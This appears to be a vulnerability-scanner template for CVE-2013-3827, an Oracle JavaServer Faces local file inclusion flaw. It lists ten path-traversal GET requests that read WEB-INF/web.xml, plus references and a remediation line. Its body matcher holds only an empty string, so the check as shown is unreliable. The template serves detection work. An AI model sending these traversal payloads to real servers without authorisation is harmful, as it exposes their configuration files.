id: CVE-2013-3827 info: name: Javafaces LFI author: Random-Robbie severity: medium description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. remediation: | Apply the latest patches and updates for the affected software to fix the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://www.exploit-db.com/exploits/38802 - https://www.oracle.com/security-alerts/cpuoct2013.html - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html - http://rhn.redhat.com/errata/RHSA-2014-0029.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.67719 epss-percentile: 0.97585 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 vendor: oracle product: fusion_middleware tags: edb,cve,cve2013,lfi,javafaces,oracle http: - method: GET path: - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "" condition: and - type: status status: - 200